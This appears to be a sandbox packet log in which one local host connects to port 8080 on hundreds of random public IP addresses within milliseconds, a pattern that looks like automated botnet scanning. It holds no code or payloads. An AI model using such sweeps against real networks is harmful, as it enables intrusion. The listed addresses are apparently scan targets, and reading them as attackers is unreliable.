Feb 14, 2024 09:28:48.051371098 CET	6752	8080	192.168.2.15	85.68.254.228
Feb 14, 2024 09:28:48.051378965 CET	6752	8080	192.168.2.15	85.202.231.72
Feb 14, 2024 09:28:48.051383972 CET	6752	8080	192.168.2.15	94.32.9.63
Feb 14, 2024 09:28:48.051383972 CET	6752	8080	192.168.2.15	62.101.154.244
Feb 14, 2024 09:28:48.051387072 CET	6752	8080	192.168.2.15	62.254.57.242
Feb 14, 2024 09:28:48.051387072 CET	6752	8080	192.168.2.15	94.110.62.187
Feb 14, 2024 09:28:48.051387072 CET	6752	8080	192.168.2.15	94.103.17.229
Feb 14, 2024 09:28:48.051387072 CET	6752	8080	192.168.2.15	94.207.167.130
Feb 14, 2024 09:28:48.051403046 CET	6752	8080	192.168.2.15	62.98.64.182
Feb 14, 2024 09:28:48.051403046 CET	6752	8080	192.168.2.15	31.31.109.7
Feb 14, 2024 09:28:48.051408052 CET	6752	8080	192.168.2.15	31.129.5.53
Feb 14, 2024 09:28:48.051408052 CET	6752	8080	192.168.2.15	94.61.29.233
Feb 14, 2024 09:28:48.051409006 CET	6752	8080	192.168.2.15	94.82.113.249
Feb 14, 2024 09:28:48.051414967 CET	6752	8080	192.168.2.15	95.117.170.21
Feb 14, 2024 09:28:48.051414967 CET	6752	8080	192.168.2.15	31.84.83.41
Feb 14, 2024 09:28:48.051414967 CET	6752	8080	192.168.2.15	31.202.24.87
Feb 14, 2024 09:28:48.051415920 CET	6752	8080	192.168.2.15	85.224.199.73
Feb 14, 2024 09:28:48.051417112 CET	6752	8080	192.168.2.15	94.4.109.23
Feb 14, 2024 09:28:48.051417112 CET	6752	8080	192.168.2.15	94.6.120.86
Feb 14, 2024 09:28:48.051417112 CET	6752	8080	192.168.2.15	31.58.96.161
Feb 14, 2024 09:28:48.051420927 CET	6752	8080	192.168.2.15	94.191.128.175
Feb 14, 2024 09:28:48.051420927 CET	6752	8080	192.168.2.15	31.220.175.0
Feb 14, 2024 09:28:48.051420927 CET	6752	8080	192.168.2.15	94.106.191.226
Feb 14, 2024 09:28:48.051429033 CET	6752	8080	192.168.2.15	95.255.190.236
Feb 14, 2024 09:28:48.051429033 CET	6752	8080	192.168.2.15	85.196.107.239
Feb 14, 2024 09:28:48.051445961 CET	6752	8080	192.168.2.15	62.76.116.191
Feb 14, 2024 09:28:48.051446915 CET	6752	8080	192.168.2.15	94.168.47.154
Feb 14, 2024 09:28:48.051450014 CET	6752	8080	192.168.2.15	85.180.121.106
Feb 14, 2024 09:28:48.051450968 CET	6752	8080	192.168.2.15	31.110.205.81
Feb 14, 2024 09:28:48.051450968 CET	6752	8080	192.168.2.15	95.96.155.222
Feb 14, 2024 09:28:48.051461935 CET	6752	8080	192.168.2.15	85.42.38.17
Feb 14, 2024 09:28:48.051461935 CET	6752	8080	192.168.2.15	94.48.46.6
Feb 14, 2024 09:28:48.051475048 CET	6752	8080	192.168.2.15	62.18.77.220
Feb 14, 2024 09:28:48.051476002 CET	6752	8080	192.168.2.15	85.53.235.144
Feb 14, 2024 09:28:48.051476002 CET	6752	8080	192.168.2.15	62.113.178.2
Feb 14, 2024 09:28:48.051489115 CET	6752	8080	192.168.2.15	85.61.27.238
Feb 14, 2024 09:28:48.051492929 CET	6752	8080	192.168.2.15	95.144.6.171
Feb 14, 2024 09:28:48.051492929 CET	6752	8080	192.168.2.15	62.56.3.64
Feb 14, 2024 09:28:48.051495075 CET	6752	8080	192.168.2.15	85.54.226.176
Feb 14, 2024 09:28:48.051495075 CET	6752	8080	192.168.2.15	62.120.125.67
Feb 14, 2024 09:28:48.051496983 CET	6752	8080	192.168.2.15	31.104.211.178
Feb 14, 2024 09:28:48.051515102 CET	6752	8080	192.168.2.15	85.224.60.56
Feb 14, 2024 09:28:48.051515102 CET	6752	8080	192.168.2.15	31.236.117.134
Feb 14, 2024 09:28:48.051520109 CET	6752	8080	192.168.2.15	62.11.21.63
Feb 14, 2024 09:28:48.051527977 CET	6752	8080	192.168.2.15	85.173.92.233
Feb 14, 2024 09:28:48.051539898 CET	6752	8080	192.168.2.15	31.162.226.160
Feb 14, 2024 09:28:48.051546097 CET	6752	8080	192.168.2.15	95.133.217.161
Feb 14, 2024 09:28:48.051547050 CET	6752	8080	192.168.2.15	85.251.125.52
Feb 14, 2024 09:28:48.051551104 CET	6752	8080	192.168.2.15	85.174.127.37
Feb 14, 2024 09:28:48.051556110 CET	6752	8080	192.168.2.15	85.82.19.183
Feb 14, 2024 09:28:48.051558971 CET	6752	8080	192.168.2.15	95.78.199.50
Feb 14, 2024 09:28:48.051565886 CET	6752	8080	192.168.2.15	85.23.106.72
Feb 14, 2024 09:28:48.051569939 CET	6752	8080	192.168.2.15	95.107.246.181
Feb 14, 2024 09:28:48.051574945 CET	6752	8080	192.168.2.15	95.169.140.215
Feb 14, 2024 09:28:48.051585913 CET	6752	8080	192.168.2.15	62.188.152.77
Feb 14, 2024 09:28:48.051585913 CET	6752	8080	192.168.2.15	94.143.121.183
Feb 14, 2024 09:28:48.051585913 CET	6752	8080	192.168.2.15	94.200.49.197
Feb 14, 2024 09:28:48.051594973 CET	6752	8080	192.168.2.15	85.233.46.217
Feb 14, 2024 09:28:48.051610947 CET	6752	8080	192.168.2.15	94.225.117.223
Feb 14, 2024 09:28:48.051610947 CET	6752	8080	192.168.2.15	85.215.30.223
Feb 14, 2024 09:28:48.051613092 CET	6752	8080	192.168.2.15	85.250.208.43
Feb 14, 2024 09:28:48.051613092 CET	6752	8080	192.168.2.15	85.52.0.225
Feb 14, 2024 09:28:48.051613092 CET	6752	8080	192.168.2.15	94.172.211.132
Feb 14, 2024 09:28:48.051615000 CET	6752	8080	192.168.2.15	95.242.85.175
Feb 14, 2024 09:28:48.051635027 CET	6752	8080	192.168.2.15	95.249.173.162
Feb 14, 2024 09:28:48.051635981 CET	6752	8080	192.168.2.15	94.66.165.179
Feb 14, 2024 09:28:48.051636934 CET	6752	8080	192.168.2.15	31.87.44.61
Feb 14, 2024 09:28:48.051636934 CET	6752	8080	192.168.2.15	95.80.101.18
Feb 14, 2024 09:28:48.051636934 CET	6752	8080	192.168.2.15	85.44.20.175
Feb 14, 2024 09:28:48.051655054 CET	6752	8080	192.168.2.15	85.24.150.148
Feb 14, 2024 09:28:48.051655054 CET	6752	8080	192.168.2.15	95.115.241.98
Feb 14, 2024 09:28:48.051655054 CET	6752	8080	192.168.2.15	95.83.10.79
Feb 14, 2024 09:28:48.051665068 CET	6752	8080	192.168.2.15	31.180.59.54
Feb 14, 2024 09:28:48.051665068 CET	6752	8080	192.168.2.15	95.247.170.219
Feb 14, 2024 09:28:48.051665068 CET	6752	8080	192.168.2.15	94.113.101.37
Feb 14, 2024 09:28:48.051672935 CET	6752	8080	192.168.2.15	85.136.70.154
Feb 14, 2024 09:28:48.051687002 CET	6752	8080	192.168.2.15	85.78.110.1
Feb 14, 2024 09:28:48.051691055 CET	6752	8080	192.168.2.15	85.149.239.239
Feb 14, 2024 09:28:48.051695108 CET	6752	8080	192.168.2.15	95.218.158.104
Feb 14, 2024 09:28:48.051700115 CET	6752	8080	192.168.2.15	95.37.125.90
Feb 14, 2024 09:28:48.051701069 CET	6752	8080	192.168.2.15	95.249.167.67
Feb 14, 2024 09:28:48.051702023 CET	6752	8080	192.168.2.15	95.148.225.186
Feb 14, 2024 09:28:48.051716089 CET	6752	8080	192.168.2.15	62.141.82.7
Feb 14, 2024 09:28:48.051717043 CET	6752	8080	192.168.2.15	85.127.21.188
Feb 14, 2024 09:28:48.051724911 CET	6752	8080	192.168.2.15	31.246.190.75
Feb 14, 2024 09:28:48.051731110 CET	6752	8080	192.168.2.15	62.249.120.22
Feb 14, 2024 09:28:48.051733971 CET	6752	8080	192.168.2.15	95.19.40.73
Feb 14, 2024 09:28:48.051733971 CET	6752	8080	192.168.2.15	85.157.181.163
Feb 14, 2024 09:28:48.051733971 CET	6752	8080	192.168.2.15	94.161.230.170
Feb 14, 2024 09:28:48.051744938 CET	6752	8080	192.168.2.15	85.3.153.99
Feb 14, 2024 09:28:48.051744938 CET	6752	8080	192.168.2.15	31.195.24.203
Feb 14, 2024 09:28:48.051760912 CET	6752	8080	192.168.2.15	85.104.3.225
Feb 14, 2024 09:28:48.051762104 CET	6752	8080	192.168.2.15	95.27.89.77
Feb 14, 2024 09:28:48.051769018 CET	6752	8080	192.168.2.15	85.115.227.73
Feb 14, 2024 09:28:48.051780939 CET	6752	8080	192.168.2.15	85.137.147.28
Feb 14, 2024 09:28:48.051783085 CET	6752	8080	192.168.2.15	85.192.113.30
Feb 14, 2024 09:28:48.051795959 CET	6752	8080	192.168.2.15	31.99.93.148
Feb 14, 2024 09:28:48.051795959 CET	6752	8080	192.168.2.15	95.65.150.64
Feb 14, 2024 09:28:48.051799059 CET	6752	8080	192.168.2.15	85.143.33.148
Feb 14, 2024 09:28:48.051799059 CET	6752	8080	192.168.2.15	62.86.32.208
Feb 14, 2024 09:28:48.051803112 CET	6752	8080	192.168.2.15	94.251.222.206
Feb 14, 2024 09:28:48.051804066 CET	6752	8080	192.168.2.15	62.73.182.178
Feb 14, 2024 09:28:48.051812887 CET	6752	8080	192.168.2.15	62.194.219.66
Feb 14, 2024 09:28:48.051826954 CET	6752	8080	192.168.2.15	95.23.34.122
Feb 14, 2024 09:28:48.051829100 CET	6752	8080	192.168.2.15	95.221.151.187
Feb 14, 2024 09:28:48.051829100 CET	6752	8080	192.168.2.15	95.4.175.4
Feb 14, 2024 09:28:48.051829100 CET	6752	8080	192.168.2.15	31.10.57.249
Feb 14, 2024 09:28:48.051831007 CET	6752	8080	192.168.2.15	94.105.204.168
Feb 14, 2024 09:28:48.051829100 CET	6752	8080	192.168.2.15	31.128.116.167
Feb 14, 2024 09:28:48.051836014 CET	6752	8080	192.168.2.15	94.248.51.78
Feb 14, 2024 09:28:48.051853895 CET	6752	8080	192.168.2.15	31.234.11.195
Feb 14, 2024 09:28:48.051856041 CET	6752	8080	192.168.2.15	95.56.243.212
Feb 14, 2024 09:28:48.051856041 CET	6752	8080	192.168.2.15	95.224.169.133
Feb 14, 2024 09:28:48.051856995 CET	6752	8080	192.168.2.15	31.90.90.159
Feb 14, 2024 09:28:48.051856995 CET	6752	8080	192.168.2.15	31.87.37.29
Feb 14, 2024 09:28:48.051871061 CET	6752	8080	192.168.2.15	62.167.178.89
Feb 14, 2024 09:28:48.051875114 CET	6752	8080	192.168.2.15	85.99.196.154
Feb 14, 2024 09:28:48.051875114 CET	6752	8080	192.168.2.15	95.5.70.205
Feb 14, 2024 09:28:48.051875114 CET	6752	8080	192.168.2.15	95.43.145.225
Feb 14, 2024 09:28:48.051875114 CET	6752	8080	192.168.2.15	31.254.135.110
Feb 14, 2024 09:28:48.051877022 CET	6752	8080	192.168.2.15	94.157.127.77
Feb 14, 2024 09:28:48.051882982 CET	6752	8080	192.168.2.15	95.29.53.3
Feb 14, 2024 09:28:48.051886082 CET	6752	8080	192.168.2.15	85.55.55.240
Feb 14, 2024 09:28:48.051886082 CET	6752	8080	192.168.2.15	95.245.155.93
Feb 14, 2024 09:28:48.051897049 CET	6752	8080	192.168.2.15	95.25.171.52
Feb 14, 2024 09:28:48.051898956 CET	6752	8080	192.168.2.15	94.174.76.41
Feb 14, 2024 09:28:48.051899910 CET	6752	8080	192.168.2.15	31.168.155.216
Feb 14, 2024 09:28:48.051898956 CET	6752	8080	192.168.2.15	85.229.171.4
Feb 14, 2024 09:28:48.051913023 CET	6752	8080	192.168.2.15	62.249.19.206
Feb 14, 2024 09:28:48.051913977 CET	6752	8080	192.168.2.15	31.152.170.23
Feb 14, 2024 09:28:48.051917076 CET	6752	8080	192.168.2.15	94.115.200.147
Feb 14, 2024 09:28:48.051934958 CET	6752	8080	192.168.2.15	62.108.239.124
Feb 14, 2024 09:28:48.051934958 CET	6752	8080	192.168.2.15	95.123.243.71
Feb 14, 2024 09:28:48.051939011 CET	6752	8080	192.168.2.15	62.80.86.93
Feb 14, 2024 09:28:48.051951885 CET	6752	8080	192.168.2.15	85.218.151.89
Feb 14, 2024 09:28:48.051953077 CET	6752	8080	192.168.2.15	31.31.239.237
Feb 14, 2024 09:28:48.051953077 CET	6752	8080	192.168.2.15	94.171.198.221
Feb 14, 2024 09:28:48.051965952 CET	6752	8080	192.168.2.15	95.201.167.110
Feb 14, 2024 09:28:48.051966906 CET	6752	8080	192.168.2.15	31.91.156.219
Feb 14, 2024 09:28:48.051974058 CET	6752	8080	192.168.2.15	85.235.48.193
Feb 14, 2024 09:28:48.051985025 CET	6752	8080	192.168.2.15	31.42.41.225
Feb 14, 2024 09:28:48.051990032 CET	6752	8080	192.168.2.15	95.206.199.41
Feb 14, 2024 09:28:48.051990986 CET	6752	8080	192.168.2.15	31.23.86.137
Feb 14, 2024 09:28:48.051992893 CET	6752	8080	192.168.2.15	94.87.250.159
Feb 14, 2024 09:28:48.051997900 CET	6752	8080	192.168.2.15	94.148.49.147
Feb 14, 2024 09:28:48.052006006 CET	6752	8080	192.168.2.15	85.18.67.172
Feb 14, 2024 09:28:48.052011967 CET	6752	8080	192.168.2.15	62.44.112.6
Feb 14, 2024 09:28:48.052012920 CET	6752	8080	192.168.2.15	94.156.129.46
Feb 14, 2024 09:28:48.052020073 CET	6752	8080	192.168.2.15	94.215.13.195
Feb 14, 2024 09:28:48.052017927 CET	6752	8080	192.168.2.15	31.2.106.239
Feb 14, 2024 09:28:48.052021027 CET	6752	8080	192.168.2.15	94.77.149.104
Feb 14, 2024 09:28:48.052017927 CET	6752	8080	192.168.2.15	95.143.146.248
Feb 14, 2024 09:28:48.052025080 CET	6752	8080	192.168.2.15	31.179.199.68
Feb 14, 2024 09:28:48.052026033 CET	6752	8080	192.168.2.15	62.232.17.230
Feb 14, 2024 09:28:48.052031040 CET	6752	8080	192.168.2.15	95.62.44.57
Feb 14, 2024 09:28:48.052046061 CET	6752	8080	192.168.2.15	85.212.113.82
Feb 14, 2024 09:28:48.052047968 CET	6752	8080	192.168.2.15	31.174.250.222
Feb 14, 2024 09:28:48.052056074 CET	6752	8080	192.168.2.15	94.146.48.239
Feb 14, 2024 09:28:48.052058935 CET	6752	8080	192.168.2.15	62.12.200.109
Feb 14, 2024 09:28:48.052073002 CET	6752	8080	192.168.2.15	85.168.10.126
Feb 14, 2024 09:28:48.052078962 CET	6752	8080	192.168.2.15	31.40.129.222
Feb 14, 2024 09:28:48.052081108 CET	6752	8080	192.168.2.15	95.242.191.55
Feb 14, 2024 09:28:48.052082062 CET	6752	8080	192.168.2.15	95.159.171.138
Feb 14, 2024 09:28:48.052081108 CET	6752	8080	192.168.2.15	31.140.117.225
Feb 14, 2024 09:28:48.052088976 CET	6752	8080	192.168.2.15	31.115.204.7
Feb 14, 2024 09:28:48.052098989 CET	6752	8080	192.168.2.15	85.91.198.116
Feb 14, 2024 09:28:48.052103043 CET	6752	8080	192.168.2.15	85.128.196.169
Feb 14, 2024 09:28:48.052103043 CET	6752	8080	192.168.2.15	85.79.128.189
Feb 14, 2024 09:28:48.052115917 CET	6752	8080	192.168.2.15	62.73.146.157
Feb 14, 2024 09:28:48.052115917 CET	6752	8080	192.168.2.15	85.185.181.247
Feb 14, 2024 09:28:48.052123070 CET	6752	8080	192.168.2.15	95.117.230.107
Feb 14, 2024 09:28:48.052124023 CET	6752	8080	192.168.2.15	31.30.100.181
Feb 14, 2024 09:28:48.052124977 CET	6752	8080	192.168.2.15	94.94.200.63
Feb 14, 2024 09:28:48.052131891 CET	6752	8080	192.168.2.15	94.113.174.10
Feb 14, 2024 09:28:48.052133083 CET	6752	8080	192.168.2.15	95.144.39.211
Feb 14, 2024 09:28:48.052145958 CET	6752	8080	192.168.2.15	85.189.176.103
Feb 14, 2024 09:28:48.052146912 CET	6752	8080	192.168.2.15	85.103.173.156
Feb 14, 2024 09:28:48.052153111 CET	6752	8080	192.168.2.15	95.153.11.198
Feb 14, 2024 09:28:48.052153111 CET	6752	8080	192.168.2.15	85.105.178.188
Feb 14, 2024 09:28:48.052153111 CET	6752	8080	192.168.2.15	85.75.32.22
Feb 14, 2024 09:28:48.052176952 CET	6752	8080	192.168.2.15	85.54.238.193
Feb 14, 2024 09:28:48.052179098 CET	6752	8080	192.168.2.15	95.173.28.1
Feb 14, 2024 09:28:48.052180052 CET	6752	8080	192.168.2.15	31.71.205.73
Feb 14, 2024 09:28:48.052180052 CET	6752	8080	192.168.2.15	95.231.38.58
Feb 14, 2024 09:28:48.052185059 CET	6752	8080	192.168.2.15	85.101.203.235
Feb 14, 2024 09:28:48.052185059 CET	6752	8080	192.168.2.15	85.230.42.200
Feb 14, 2024 09:28:48.052189112 CET	6752	8080	192.168.2.15	85.97.176.130
Feb 14, 2024 09:28:48.052189112 CET	6752	8080	192.168.2.15	95.229.25.84
Feb 14, 2024 09:28:48.052198887 CET	6752	8080	192.168.2.15	95.96.165.1
Feb 14, 2024 09:28:48.052206039 CET	6752	8080	192.168.2.15	31.57.143.30
Feb 14, 2024 09:28:48.052206993 CET	6752	8080	192.168.2.15	31.16.161.202
Feb 14, 2024 09:28:48.052206993 CET	6752	8080	192.168.2.15	94.136.178.62
Feb 14, 2024 09:28:48.052210093 CET	6752	8080	192.168.2.15	95.7.57.130
Feb 14, 2024 09:28:48.052211046 CET	6752	8080	192.168.2.15	31.81.225.251
Feb 14, 2024 09:28:48.052212000 CET	6752	8080	192.168.2.15	85.128.77.130
Feb 14, 2024 09:28:48.052212000 CET	6752	8080	192.168.2.15	94.91.251.215
Feb 14, 2024 09:28:48.052227974 CET	6752	8080	192.168.2.15	62.20.234.197
Feb 14, 2024 09:28:48.052228928 CET	6752	8080	192.168.2.15	95.152.230.214
Feb 14, 2024 09:28:48.052238941 CET	6752	8080	192.168.2.15	85.109.179.185
Feb 14, 2024 09:28:48.052242041 CET	6752	8080	192.168.2.15	31.10.105.224
Feb 14, 2024 09:28:48.052246094 CET	6752	8080	192.168.2.15	62.90.197.5
Feb 14, 2024 09:28:48.052246094 CET	6752	8080	192.168.2.15	31.18.177.153
Feb 14, 2024 09:28:48.052247047 CET	6752	8080	192.168.2.15	85.212.114.158
Feb 14, 2024 09:28:48.052263975 CET	6752	8080	192.168.2.15	95.47.253.119
Feb 14, 2024 09:28:48.052263975 CET	6752	8080	192.168.2.15	31.59.215.73
Feb 14, 2024 09:28:48.052263975 CET	6752	8080	192.168.2.15	94.91.195.195
Feb 14, 2024 09:28:48.052275896 CET	6752	8080	192.168.2.15	94.76.232.81
Feb 14, 2024 09:28:48.052280903 CET	6752	8080	192.168.2.15	31.248.188.94
Feb 14, 2024 09:28:48.052282095 CET	6752	8080	192.168.2.15	94.87.68.197
Feb 14, 2024 09:28:48.052293062 CET	6752	8080	192.168.2.15	62.217.245.170
Feb 14, 2024 09:28:48.052295923 CET	6752	8080	192.168.2.15	62.167.10.64
Feb 14, 2024 09:28:48.052308083 CET	6752	8080	192.168.2.15	95.15.93.51
Feb 14, 2024 09:28:48.052308083 CET	6752	8080	192.168.2.15	62.165.226.252
Feb 14, 2024 09:28:48.052313089 CET	6752	8080	192.168.2.15	95.201.129.59
Feb 14, 2024 09:28:48.052325010 CET	6752	8080	192.168.2.15	95.6.239.217
Feb 14, 2024 09:28:48.052328110 CET	6752	8080	192.168.2.15	85.207.76.229
Feb 14, 2024 09:28:48.052330971 CET	6752	8080	192.168.2.15	62.160.79.2
Feb 14, 2024 09:28:48.052342892 CET	6752	8080	192.168.2.15	85.211.239.241
Feb 14, 2024 09:28:48.052350044 CET	6752	8080	192.168.2.15	62.183.117.137
Feb 14, 2024 09:28:48.052351952 CET	6752	8080	192.168.2.15	95.165.113.55
Feb 14, 2024 09:28:48.052362919 CET	6752	8080	192.168.2.15	95.61.147.237
Feb 14, 2024 09:28:48.052364111 CET	6752	8080	192.168.2.15	94.217.153.26
Feb 14, 2024 09:28:48.052369118 CET	6752	8080	192.168.2.15	31.230.71.197
Feb 14, 2024 09:28:48.052376032 CET	6752	8080	192.168.2.15	62.198.145.20
Feb 14, 2024 09:28:48.052381992 CET	6752	8080	192.168.2.15	85.95.238.5
Feb 14, 2024 09:28:48.052385092 CET	6752	8080	192.168.2.15	95.12.212.137
Feb 14, 2024 09:28:48.052392006 CET	8080	38576	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:48.052400112 CET	6752	8080	192.168.2.15	95.50.126.126
Feb 14, 2024 09:28:48.052407026 CET	6752	8080	192.168.2.15	85.0.120.252
Feb 14, 2024 09:28:48.052407026 CET	6752	8080	192.168.2.15	95.163.105.8
Feb 14, 2024 09:28:48.052417040 CET	6752	8080	192.168.2.15	31.116.37.250
Feb 14, 2024 09:28:48.052417994 CET	6752	8080	192.168.2.15	85.148.27.12
Feb 14, 2024 09:28:48.052428007 CET	6752	8080	192.168.2.15	94.24.210.123
Feb 14, 2024 09:28:48.052432060 CET	6752	8080	192.168.2.15	85.33.211.208
Feb 14, 2024 09:28:48.052434921 CET	6752	8080	192.168.2.15	85.16.50.198
Feb 14, 2024 09:28:48.052450895 CET	6752	8080	192.168.2.15	85.126.248.195
Feb 14, 2024 09:28:48.052450895 CET	6752	8080	192.168.2.15	62.243.76.7
Feb 14, 2024 09:28:48.052453041 CET	6752	8080	192.168.2.15	95.84.235.14
Feb 14, 2024 09:28:48.052453041 CET	6752	8080	192.168.2.15	62.237.39.170
Feb 14, 2024 09:28:48.052465916 CET	6752	8080	192.168.2.15	85.187.18.196
Feb 14, 2024 09:28:48.052474976 CET	6752	8080	192.168.2.15	94.167.74.89
Feb 14, 2024 09:28:48.052474976 CET	38576	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:48.052474976 CET	6752	8080	192.168.2.15	31.49.78.100
Feb 14, 2024 09:28:48.052474976 CET	6752	8080	192.168.2.15	31.146.185.239
Feb 14, 2024 09:28:48.052478075 CET	6752	8080	192.168.2.15	95.149.205.7
Feb 14, 2024 09:28:48.052479982 CET	6752	8080	192.168.2.15	85.140.101.173
Feb 14, 2024 09:28:48.052479982 CET	6752	8080	192.168.2.15	31.174.184.166
Feb 14, 2024 09:28:48.052479982 CET	6752	8080	192.168.2.15	94.19.178.62
Feb 14, 2024 09:28:48.052491903 CET	6752	8080	192.168.2.15	94.82.50.232
Feb 14, 2024 09:28:48.052491903 CET	6752	8080	192.168.2.15	85.101.113.224
Feb 14, 2024 09:28:48.052496910 CET	6752	8080	192.168.2.15	85.117.136.41
Feb 14, 2024 09:28:48.052508116 CET	6752	8080	192.168.2.15	31.78.78.196
Feb 14, 2024 09:28:48.052520990 CET	6752	8080	192.168.2.15	95.252.73.199
Feb 14, 2024 09:28:48.052521944 CET	6752	8080	192.168.2.15	94.240.19.35
Feb 14, 2024 09:28:48.052531004 CET	6752	8080	192.168.2.15	94.17.122.231
Feb 14, 2024 09:28:48.052536964 CET	6752	8080	192.168.2.15	95.181.231.226
Feb 14, 2024 09:28:48.052536964 CET	6752	8080	192.168.2.15	62.112.53.216
Feb 14, 2024 09:28:48.052541018 CET	6752	8080	192.168.2.15	62.192.248.53
Feb 14, 2024 09:28:48.052561045 CET	6752	8080	192.168.2.15	31.102.31.220
Feb 14, 2024 09:28:48.052561045 CET	6752	8080	192.168.2.15	62.127.85.156
Feb 14, 2024 09:28:48.052561045 CET	6752	8080	192.168.2.15	62.117.241.141
Feb 14, 2024 09:28:48.052561045 CET	6752	8080	192.168.2.15	95.40.34.114
Feb 14, 2024 09:28:48.052570105 CET	6752	8080	192.168.2.15	62.86.141.140
Feb 14, 2024 09:28:48.052570105 CET	6752	8080	192.168.2.15	31.129.195.121
Feb 14, 2024 09:28:48.052570105 CET	6752	8080	192.168.2.15	95.84.49.152
Feb 14, 2024 09:28:48.052576065 CET	6752	8080	192.168.2.15	85.78.79.62
Feb 14, 2024 09:28:48.052577019 CET	6752	8080	192.168.2.15	62.131.93.20
Feb 14, 2024 09:28:48.052577019 CET	6752	8080	192.168.2.15	94.76.138.126
Feb 14, 2024 09:28:48.052577972 CET	6752	8080	192.168.2.15	62.100.35.18
Feb 14, 2024 09:28:48.052584887 CET	6752	8080	192.168.2.15	62.211.82.176
Feb 14, 2024 09:28:48.052598953 CET	6752	8080	192.168.2.15	85.252.17.117
Feb 14, 2024 09:28:48.052599907 CET	6752	8080	192.168.2.15	31.46.151.227
Feb 14, 2024 09:28:48.052599907 CET	6752	8080	192.168.2.15	95.54.140.2
Feb 14, 2024 09:28:48.052603006 CET	6752	8080	192.168.2.15	95.40.205.95
Feb 14, 2024 09:28:48.052608967 CET	6752	8080	192.168.2.15	85.196.137.205
Feb 14, 2024 09:28:48.052618027 CET	6752	8080	192.168.2.15	85.120.115.12
Feb 14, 2024 09:28:48.052618027 CET	6752	8080	192.168.2.15	85.133.200.182
Feb 14, 2024 09:28:48.052639961 CET	6752	8080	192.168.2.15	62.163.246.67
Feb 14, 2024 09:28:48.052642107 CET	6752	8080	192.168.2.15	95.209.14.10
Feb 14, 2024 09:28:48.052643061 CET	6752	8080	192.168.2.15	95.14.237.104
Feb 14, 2024 09:28:48.052651882 CET	6752	8080	192.168.2.15	95.56.4.207
Feb 14, 2024 09:28:48.052659035 CET	6752	8080	192.168.2.15	62.219.19.180
Feb 14, 2024 09:28:48.052660942 CET	6752	8080	192.168.2.15	95.43.165.226
Feb 14, 2024 09:28:48.052660942 CET	6752	8080	192.168.2.15	62.185.9.40
Feb 14, 2024 09:28:48.052660942 CET	6752	8080	192.168.2.15	95.44.244.70
Feb 14, 2024 09:28:48.052675009 CET	6752	8080	192.168.2.15	95.105.215.41
Feb 14, 2024 09:28:48.052683115 CET	6752	8080	192.168.2.15	31.149.185.253
Feb 14, 2024 09:28:48.052705050 CET	6752	8080	192.168.2.15	62.11.149.190
Feb 14, 2024 09:28:48.052706957 CET	6752	8080	192.168.2.15	62.245.82.178
Feb 14, 2024 09:28:48.052712917 CET	6752	8080	192.168.2.15	95.22.90.36
Feb 14, 2024 09:28:48.052717924 CET	6752	8080	192.168.2.15	95.230.197.143
Feb 14, 2024 09:28:48.052723885 CET	6752	8080	192.168.2.15	95.114.90.132
Feb 14, 2024 09:28:48.052730083 CET	6752	8080	192.168.2.15	62.233.47.136
Feb 14, 2024 09:28:48.052737951 CET	6752	8080	192.168.2.15	94.65.162.165
Feb 14, 2024 09:28:48.052738905 CET	6752	8080	192.168.2.15	95.235.8.164
Feb 14, 2024 09:28:48.052747011 CET	6752	8080	192.168.2.15	94.109.222.59
Feb 14, 2024 09:28:48.052759886 CET	6752	8080	192.168.2.15	95.124.74.24
Feb 14, 2024 09:28:48.052759886 CET	6752	8080	192.168.2.15	31.138.25.93
Feb 14, 2024 09:28:48.052759886 CET	6752	8080	192.168.2.15	62.253.38.116
Feb 14, 2024 09:28:48.052763939 CET	6752	8080	192.168.2.15	94.63.237.106
Feb 14, 2024 09:28:48.052767992 CET	6752	8080	192.168.2.15	62.58.45.104
Feb 14, 2024 09:28:48.052767992 CET	6752	8080	192.168.2.15	94.110.155.56
Feb 14, 2024 09:28:48.052779913 CET	6752	8080	192.168.2.15	94.176.65.113
Feb 14, 2024 09:28:48.052783966 CET	6752	8080	192.168.2.15	85.154.174.86
Feb 14, 2024 09:28:48.052783966 CET	6752	8080	192.168.2.15	95.67.176.224
Feb 14, 2024 09:28:48.052788019 CET	6752	8080	192.168.2.15	94.175.16.23
Feb 14, 2024 09:28:48.052788019 CET	6752	8080	192.168.2.15	85.26.86.93
Feb 14, 2024 09:28:48.052804947 CET	6752	8080	192.168.2.15	85.196.38.195
Feb 14, 2024 09:28:48.052809000 CET	6752	8080	192.168.2.15	95.59.168.197
Feb 14, 2024 09:28:48.052809000 CET	6752	8080	192.168.2.15	85.123.196.54
Feb 14, 2024 09:28:48.052814960 CET	6752	8080	192.168.2.15	31.159.108.200
Feb 14, 2024 09:28:48.052824020 CET	6752	8080	192.168.2.15	31.59.16.42
Feb 14, 2024 09:28:48.052829981 CET	6752	8080	192.168.2.15	62.64.180.69
Feb 14, 2024 09:28:48.052835941 CET	6752	8080	192.168.2.15	94.31.145.72
Feb 14, 2024 09:28:48.052845001 CET	6752	8080	192.168.2.15	62.133.53.71
Feb 14, 2024 09:28:48.052845001 CET	6752	8080	192.168.2.15	95.97.122.107
Feb 14, 2024 09:28:48.052848101 CET	6752	8080	192.168.2.15	85.204.50.209
Feb 14, 2024 09:28:48.052848101 CET	6752	8080	192.168.2.15	95.54.39.84
Feb 14, 2024 09:28:48.052860975 CET	6752	8080	192.168.2.15	94.156.169.62
Feb 14, 2024 09:28:48.052860975 CET	6752	8080	192.168.2.15	31.220.205.195
Feb 14, 2024 09:28:48.052870989 CET	6752	8080	192.168.2.15	95.60.85.105
Feb 14, 2024 09:28:48.052879095 CET	6752	8080	192.168.2.15	62.61.151.182
Feb 14, 2024 09:28:48.052879095 CET	6752	8080	192.168.2.15	94.195.119.59
Feb 14, 2024 09:28:48.052881002 CET	6752	8080	192.168.2.15	94.204.8.157
Feb 14, 2024 09:28:48.052887917 CET	6752	8080	192.168.2.15	95.1.172.190
Feb 14, 2024 09:28:48.052896023 CET	6752	8080	192.168.2.15	94.218.36.65
Feb 14, 2024 09:28:48.052896976 CET	6752	8080	192.168.2.15	95.112.106.94
Feb 14, 2024 09:28:48.052910089 CET	6752	8080	192.168.2.15	31.66.87.195
Feb 14, 2024 09:28:48.052910089 CET	6752	8080	192.168.2.15	85.109.145.193
Feb 14, 2024 09:28:48.052917004 CET	6752	8080	192.168.2.15	62.59.218.230
Feb 14, 2024 09:28:48.052932024 CET	6752	8080	192.168.2.15	95.150.231.10
Feb 14, 2024 09:28:48.052932024 CET	6752	8080	192.168.2.15	31.144.76.83
Feb 14, 2024 09:28:48.052932024 CET	6752	8080	192.168.2.15	85.238.165.129
